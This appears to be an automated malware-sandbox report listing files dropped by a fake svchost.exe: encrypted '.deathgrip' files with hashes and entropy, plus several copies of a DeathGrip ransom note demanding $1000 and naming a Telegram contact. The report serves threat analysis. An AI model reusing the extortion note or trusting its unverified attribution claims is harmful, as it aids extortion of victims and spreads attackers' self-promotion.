                                                          Preview:..........M.+.].M.j.3B$.cZ../.7....hLA...}l....k.G.{?'..`.C.9...9..^H...mr...L......O..E..E.#.&...{].*..s5.I....@iscqjv...8.gz.L..5kq...F.s.d!...&(.v..`1mo[....5SU..g..y...J.....X...x.B~t.mZ..[.mkm...........c.TS..>....h(..S.`E..).........[D..........F....#R...*z.....v.......LJCB...N.~...0.>G.,..c.T#...S.x.....W......O,..g.a...?.p.B~=|...Y....s."......02U..n..F..*...4v=..j.r.m.M..w.2sM[*....V..X.-...i..I..?."..]X.{..XV.Sq.R.xs...Sgs...K"..\...o......a..LD\..a.mq93.<.ElD....q].N.....JdJ.d.p..h.........,.BE+.4....Q.Q:......X4.5...T...Dt.x{..=Z.y.%.r...|..v..,/.$p.Vk........H..R.Ek.t..J....6D....nWf\$......u.Q...Z.... .2..Lc.O.2..3G.."...7(7L.....!D|mw....".....R..?.......@....}.........f.y..]..R...Bg*7.4...O. >...>..Z..u....aw.@dp..[?F...h...[p..Y....7.EZW.M...n~...../.?d.....u./...I......b3....2s.S)"7...#!..^...u...7..; .>.Q09.]-..:_}X.E.[ ..2i~K.#...@*...R8....}........2Ts.a..\......y.q....O.&,u..x@ ...X.P......._.;%.T.L.b.r*.U....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.973235940619088
                                                          Encrypted:false
                                                          SSDEEP:192:jiuxZbB/ATveQhmdnTL4e3ZqqzEg/bxGFWusiKYQWyYOzwdat:jiuxVhATGGmdnTL4MZGgTMiiKYaYXat
                                                          MD5:8F75768B3AAA35087C8DF59FAC47C853
                                                          SHA1:3C21EB5CABF67A2255ABBE88064628E6D9DC5EEF
                                                          SHA-256:C0CBACE6219AFFA8C271D1E243094EC07E495C527021EE30F87613EF77BED905
                                                          SHA-512:D37B90CE48F6EC2C91C0612FCD3318D6AC74912E68A787FB092F8D1789BF842066F6154F01CF81FAB0B91D8BE4563C775DB499C086E245D53D41410D5D86274F
                                                          Malicious:false
                                                          Preview:........4..A.....pR.......q.G....l.v2..!.d#Gs.F8...t......!..L..>..".!...A.0....{.....(I.G:K..n!.3*..s..'..b..W.T...&...B...v>p..#"......zfpP.I......4v.X!........V .......@...g.=P.Ov..>f..^......H.E...0Z.P...B...FQE...M.R.n..J..}...T...~./..U.*e...R9N..#Y/..kJ5&{.#.?,:.Q..9..RU'.:8...y...5.DhM6..=.#.2.....A....CWd(..)Bf..6....&Cq.......E.V..}`.m..#H.v....[x..j..........s.l!...d.?.H..V_.f..... .$.X.....96..F.%.....G.9...D.}...U^........>i.;..L....m...p......4J5...k....O.3........iv.m`ovL.....w.}._]...o./..lm.=..].s....A..R...s.a{..y.D...!..Md.Nm..B.4t..lvzH`......*.K...,d.cI..km...p....i...a.i..gB...wV.'[.N...(*...?3.u...TSX.'F.,ys.g@...QXe....H...rg.<..v.I.A.Q.....B-.q..Y......*Cu...B..0....+MA..#BO.h.[.i.>.Q..p.......x..I..........L......p..i-.?b.^V.}.R+.f..B....h....,."...$I.Og..h.J.t.....L/p..@Zn.>.v.........Rs.u.....C.W....*.....n1...+..z..K..J.?..}W....Z.Dj0u.\<HH.(5.....e.F.vB.d[..a~..d`S.m4.o.e.......-.Wn~V./.$.h^....UK...-..+.E.S_w...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.976241325416658
                                                          Encrypted:false
                                                          SSDEEP:192:iHbYJQk62tL7YdbaG0y46TZvSn2CVxo4MlOMuC:iHbYyZ6PaGBy469BaalOu
                                                          MD5:DAF8DC7EED284E31C9D826E028D80569
                                                          SHA1:D549850D0F24D952513C146B3BC5DC60CBCDD712
                                                          SHA-256:2B469098C6C914EC8609327A98CFB5D1E5E67E6D1CFCDFE28F4B92F83C2F8247
                                                          SHA-512:37A0755391CB7A90098E38A87BF0D3494F586CDEA9C4FEFED5AF02B82AE2C2EFF7C99248E57E0383760B495C85E6ED1A8AB7E3F444C27D7B5F46C515984357B1
                                                          Malicious:false
                                                          Preview:..........C.f.......H...Vj3OjW5.p...O]..?1......Zd....J...-n7=.....F..;........Z.H.6..>./NHd,#.E....C=.JJ.=h.......SF......".hN1..........U.._.....7Zo96Kzu..dh.....).....m..h.q...m...1.).c.......,......U..o.....{dR.....]..ww..LA..#...;!z<g.].4!ok.'.....-.......bO.n..yW.u..5..U...^5.M.|.M.^...1d..x.....D.HD..o.....H....$3.47d.|.P...Bn...o.R.........,.tL...[..u*~...WOvv.F........Q.z8&....d.M.0V.+.2@......$...o...<1.a.k...TO.(..#.O....B.Es.W..!kN.,.#..9z....6.Z..w^.)....."..v0..?.R.X.P..z,L."......K...o..D.......u.'I........G...v...z....2.Hi.xc..P...7....r..._.}.!h.!...3..j.l.n}...E0)..V.w..$1....HF..`Xq.kF.YpP..G...Z[%.I.m..@..>.i.V.u..zV..6>NIW"5........M..X_Y5.....D.....\...2....u.MK) \S..b%....J(.Rc.E[wtE._u....i..q...#....-.Roa.&...M..;.j..G4..e4.us..r..._. 2..)..../1......|2.k.R&$..kyv..T#...;...a.._0.~.....%{0z.?.2d.l..8$x..i1.I..SL&.7.!....."..O/=.Y..H.!.jRA.on....O)(..pM.@.._...Q.....7...7....(J...3!..f.}..5Bo*.5..3..}?~...).tuK

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.973201514593005
                                                          Encrypted:false
                                                          SSDEEP:192:Gy9uUedmRMdJCrGDFy12GKwwCwQT3/13ksW37B9pmz:d9utOr4ufHD13G3rUz
                                                          MD5:31744A5FA720B805575D4B1D7834A807
                                                          SHA1:442E918E32CA0688A9E2F8888259E4AEAE6BA56E
                                                          SHA-256:AE02545D31AD57539B41FD1D975932BC121C0691F631C56D1E11DCC697AA53A3
                                                          SHA-512:24423D01F91B1F4D86EDC604CA5F94F8D95294C63040D075DEE3B629D1736F4FFAA2E718CA6782DC1670C9545001439D9EC4AE7DC186A471EBD3E4A86D98E24B
                                                          Malicious:false
                                                          Preview:........E.....U.......y<Y.JK...p.w?..a...@.Bf..=bM.q.T.....I6....K=......%..5...p..4..c.........#......t..........vB...a...=.a..b...b.;a.D..........}.F......h.6......s=..a........R.o.f.R.A.B3.|.+..p.6.6..5x..*s_(w.'.....?......DV.3...,...&.7..s.....i)|...Ep.+,)c...bx.....(...6.Gl.a.8B".... .?.`.3....c&.c..f...cJ6..<H.Fu#....|....0>t..o+`8....x.G.....X.......xb...U..[z..Lq..V>..,....s..F...}..z.}....... c. wjW.Y...by.....l.r...E\...?oz.?(i.qw.\.y...."...i)..6.i~.....\x.K..&...h..0.n..-.T...j@...b.|.,.o}......vZ...'..t.....k-..3.....X.b.....+.pU.....W...9.........Z.....mg.6...P.)..x....J@Q..*..JY..R......90w+2..k..;,5......I.3...mM...Nnyb.,n1+..L,.}.)v.H..."...E.=;.v..w J.V$Z9......$W]..P_z..k..J........c..'.U..#..(.'.... .L.[..a.#8.B]..OJ.o3C..s../..........V8..W...#gN:k.WZ.:....,j.T...).:..........Z..|M...........x..3...9.....$h*.MO.Q....(....Y...k7Wr..y.E...!.e)..<...B.m:..p.[F.5.9Ki.@.F.l8+....D...f...(.*"M..7n[p...1...83".V...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.979720212746203
                                                          Encrypted:false
                                                          SSDEEP:192:D4LuM1O7LmwcxzHgEj5C4feFdtnB/Kyl0o1eYmPtl:D4yMKVcxzx5CieFdtn4w0z9v
                                                          MD5:E2AE8EEA7AB8518FC84F28E0832CD675
                                                          SHA1:B48066ECF1C73E7BF10D0351E2D682044A1A88ED
                                                          SHA-256:38A579435AE7343AAFE004E3E05DDB71B561F35FC8F5F4327F960EA6B9F6906B
                                                          SHA-512:4D231495166EA5F5B4DC5E7EAAAD9A1A9A549C5DECBA7F1054AB4B9DE43A1E3BF338EFC2B5FAFFE1716F6346F3EDB2674819B139B91E0A42BF2B6ADC4EC6E0F1
                                                          Malicious:false
                                                          Preview:........"....O...U...-..n.....~..qP..\:...-.......SI..=.e.N..Y"..T0.Q.=.n..........E..o........xO...R..3.gY......{g\.........DRzK...8....A..8...L....}.Vv2.7....9I.}....<.Q=.yM`{...K..l...*[.....u.}......sf... .l#.q?.'...4,$@d....l"..JZ. ......M...J.n.2(..).x-U..s;;,.L....~....E..A...s._k..8..j.+.R.qR..?.......@.L..FiHK].s..S)....&......a4+..9b.8.+......`^.<M...UM`..N.G..NA..,:{.i...U.E.,..b.`U..L\.).{.~}..d.D.$..0...*..._8.n.*...U)y..a..~.w..[...X.Q.b.....5k.7c..G@.mle^n..]...T.}.;-...6U...E...sp.......S<..X..=..Z.....3T......v`K..'...?..5U....J}.6.Zk..%...%..e9yIRm.9c..A!...=..U....Zj...i.ub,...$!..4>.G\.|....D7.....r......f..i.ivY..D>...u......N....0=.y...G......C.c....8.V..)s6.e...o.~.B....R.....".w.zJ...8tq.......3..Z&.%.1..!..`__...V.2..[fd....9..>...u...f...J.zE....39N.=7}....}....l..qTKB...$m.X.1..7.%K...uS..}o.t...y....s.....{...-..l..OvG.|.W...tB.1.%]...)...c.4f/.$.....O....y...*........8..Y.!2..$..~..8.4.j.....=Z.#[oA....."..3.y"...[..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.9770019216388866
                                                          Encrypted:false
                                                          SSDEEP:192:clCUy7VKBMw4mR8NXhhY0Ysvo4Uzd8M0bXKe/WaW:hUuKT43nFYikze9zOD
                                                          MD5:1681416B40738BBC2BED6E8E7DB5EDEB
                                                          SHA1:D8F5846C1173AAF97BB6C3D398AD2BDEF2BEC17A
                                                          SHA-256:E1CD5FA2D009355F15B67E2545003E1C5DA6F2DD314442BCE5F20EFE6427190A
                                                          SHA-512:72A170E50357FFC79C2550C033D126E8CBE64DB9DEDBD712E7338E19146C9607AD8F6CA0F6A02835C324313DF858E8431DCA967B9F93BCC93D7376FCD33E56B6
                                                          Malicious:false
                                                          Preview:........+~_..}.iN..k.m.a9g....UX.p....51.......$4...y.2.......).*...W[..k..:$..y.G.x.$..*.\.@.........@...D..(.......T..5cv% ...t/..F...>'..q.&.I..e>.,5./..Tz..%..`.l,E..j.Kg`. ..<.A<..v?...O...K. ....G#o....7(...:L...$A.....W{.v3......n].%.......z2.N..II.d...C_..I%.....nX.iKb.q.....j....9...`.O.K.R.6..a-z...l{.p..$;|%.....a..Xl._OA..............=...v&.\3..v.h.k'.?....)p9/.*.#A.c]/...1.M.....rk.}b=...8$..p...i..\o4a.q1Y.i....?.e.5......l....}.y..i.7.1.......tmBLi`.,&^....v..V...y\...TT....Z^jx'{..kY./n...07 H?.E.U...J.!^.$...+.y.........~..z..q.\'.w9va.3..G}./..m.9.......l.>...|u.L0'n./a.'.oe.B.~D....f..GI4.p6.i@.A4.K..q.eK...T.]...jnZ.~@....nc..{a5.."E#..........t....9.............q.....v.t.5..{...=p..9^..j...I..L.+C.e....*D.j.|w.....@..Fv.`..ot..I;.*"H.......2..........>...k..._y?........o....X...~-,s.....8...Y....c.s......o...t-P.....+.zdd.$.NN^.......9.s.|p.......L}...?.-..^j..+.T....L.n....|(.....$'..-..pFuw....jj.....d...N./s.....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.970764489592101
                                                          Encrypted:false
                                                          SSDEEP:192:Xfrv+RAmqtekatDOk4szGCq17vnNzzh5PqMzNbA:XfrvlqRUrFhzh5ygM
                                                          MD5:D88CDC6EBC06D55D736794A574E80F74
                                                          SHA1:1E6812BACBB0441FEFA372174A4E5F45B8EACCD3
                                                          SHA-256:30F42B4AD1D7D03C4671E2295E60E4C51FF00689FC83B83DE087510095C76335
                                                          SHA-512:F95758326C5EDF687CC8F12C47AD81DE3135CE0104B9EBE13E95F022573C7B3F88B3B2CC1E4A8B105BA21456DF7FABF925442C99D3178BC41E782D50BAAFD0C2
                                                          Malicious:false
                                                          Preview:.........8 .._..'.PUz.#.2Wh..=6@......N.]...R.....z.'/F..........#..c.E$...%N..1&...k.........I.(..}B[........E......:vQ...Pp..W.wr..rp...5..`.`a...u.P0...S.>.J..."8T3A#.r..Q.S..HC.ywH~S.nw... ....GF...........R.\0T?.2...r...p.r(..|.r...|..J....1...Qn......?.f.U...+t.R1|...O...*.HCgr.`.|`..|./....Y...).......J.Z..FH.<]..t;.H2..b........lq.J8....RrP..0...)...=...BRp.&..2...7..#.;.}.&..[..hy:..@b...D..(...P..8.G.jz.....^..v..s..R.._K*D..wg/.7R.W<...J.].5.[Zw;...{....9.W...k.Yb..w......9f.j..x.).K.0.3V.+..^..&....d.!.2..sF1..,.N.f..I...V.._....v..r.H.f.@.u.t...G?..(B.S...|[..G..V....k...xw}.<.*'pJ.HU..t.. W...!.xO.......u( ..#.`b.^..........sV......x.>..w.@..f.0@A-y.#\..1...s.{..J...a..p...._3X..TN..L....c!n/.p;f...%......o......J0dpp...k....s .q....pW...\&....3kqR.).?=..(...:!........4.1....i.A...2.n....R.K..9P&..).u.....H.+.G..\..8...A.!..{.u..w.H.w....h".k...!..._.U..\...B....L2n ..$.-:......k....`.............Uy..,.a.v@.+.&..........qQV..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
